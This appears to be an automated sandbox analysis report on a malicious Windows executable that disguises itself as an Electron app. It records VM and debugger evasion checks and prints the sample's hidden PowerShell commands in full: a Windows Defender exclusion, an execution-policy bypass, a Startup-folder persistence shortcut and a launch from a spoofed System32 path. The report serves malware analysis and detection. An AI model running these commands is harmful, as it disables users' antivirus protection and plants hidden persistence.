Source: YoS6ZBCcUy.exe, 00000000.00000002.2201242233.0000000004B54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&
Source: YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: (IsLinux() && isVMWare) || (IsAndroid() && isNvidia) || (IsAndroid() && GetAndroidSDKVersion() < 27 && IsAdreno5xxOrOlder(functions)) || (!isMesa && IsMaliT8xxOrOlder(functions)) || (!isMesa && IsMaliG31OrOlder(functions))
Source: YoS6ZBCcUy.exe, 00000000.00000003.2147363367.000000000070C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f
Source: YoS6ZBCcUy.exe, 00000000.00000003.2143409636.0000000000701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YoS6ZBCcUy.exe, 00000000.00000003.2147321239.0000000004B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YoS6ZBCcUy.exe, 00000000.00000002.2201242233.0000000004B38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}OOY
Source: YoS6ZBCcUy.exe, 00000000.00000003.2082003478.0000000004758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tgaR
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: YoS6ZBCcUy.exe, 00000000.00000003.2082003478.0000000004758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Screen Codec / VMware Video
Source: YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ZAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTestp
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeAPI call chain: ExitProcess graph end nodegraph_0-3391
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FE5108 rdtsc 19_2_00007FF780FE5108
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE1024C8F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FFE1024C8F0
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9A960 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,19_2_00007FF780F9A960
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F932BC GetProcessHeap,HeapFree,19_2_00007FF780F932BC
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF7810A5AA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF7810A5AA4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FF7810A5AA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FF7810A5AA4
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE1024C8F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FFE1024C8F0
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE1024C14C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_00007FFE1024C14C
Source: C:\Windows \System32\winSAT.exeCode function: 22_2_00007FFE102501C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_00007FFE102501C4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FF7810A5AA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FF7810A5AA4
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE3F83C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FFDFFE3F83C
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE3FFE0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FFDFFE3FFE0
Source: C:\Windows \System32\winSAT.exeCode function: 31_2_00007FFDFFE438B4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FFDFFE438B4

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq NSIS.exe" /FO csv | "C:\Windows\system32\find.exe" "NSIS.exe"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "NSIS.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe "C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe" /NOLICPROMPT /timer:300
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()""
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\winSAT.exe "C:\Windows \System32\winSAT.exe"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadgaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell -command "$s=(new-object -com wscript.shell).createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\myelectronapp.lnk');$s.targetpath='c:\users\user\appdata\local\programs\nsis\nsis.exe';$s.save()""
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\nsis" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; add-mppreference -exclusionpath $targetpath; }"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; $bginfopath = join-path $targetpath 'bginfo.exe'; start-process -filepath $bginfopath -argumentlist '/nolicprompt /timer:300' -workingdirectory $targetpath -windowstyle hidden; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell -command "$s=(new-object -com wscript.shell).createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\myelectronapp.lnk');$s.targetpath='c:\users\user\appdata\local\programs\nsis\nsis.exe';$s.save()""
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadgaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\nsis" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; add-mppreference -exclusionpath $targetpath; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadoaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaabcaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadgaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1740,i,4228251472899139808,8446722721828354665,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell -command "$s=(new-object -com wscript.shell).createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\myelectronapp.lnk');$s.targetpath='c:\users\user\appdata\local\programs\nsis\nsis.exe';$s.save()""Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\nsis" --field-trial-handle=2416,i,4228251472899139808,8446722721828354665,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:3Jump to behavior
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; add-mppreference -exclusionpath $targetpath; }"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; $bginfopath = join-path $targetpath 'bginfo.exe'; start-process -filepath $bginfopath -argumentlist '/nolicprompt /timer:300' -workingdirectory $targetpath -windowstyle hidden; }"
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadgaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1800,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1792 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell -command "$s=(new-object -com wscript.shell).createshortcut('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\myelectronapp.lnk');$s.targetpath='c:\users\user\appdata\local\programs\nsis\nsis.exe';$s.save()""
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\nsis" --field-trial-handle=2424,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2420 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe "c:\users\user\appdata\local\programs\nsis\nsis.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\nsis" --gpu-preferences=uaaaaaaaaadoaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaabcaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -noprofile -executionpolicy bypass -windowstyle hidden -command "& {$userprofile = [environment]::getfolderpath('userprofile'); $targetpath = join-path $userprofile 'appdata\roaming\myelectronapp'; add-mppreference -exclusionpath $targetpath; }"
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9E514 LocalAlloc,LocalAlloc,CreateWellKnownSid,CreateWellKnownSid,memset,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,LocalFree,LocalFree,19_2_00007FF780F9E514
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780FD73DC AllocateAndInitializeSid,CheckTokenMembership,FreeSid,GetLastError,GetLastError,19_2_00007FF780FD73DC
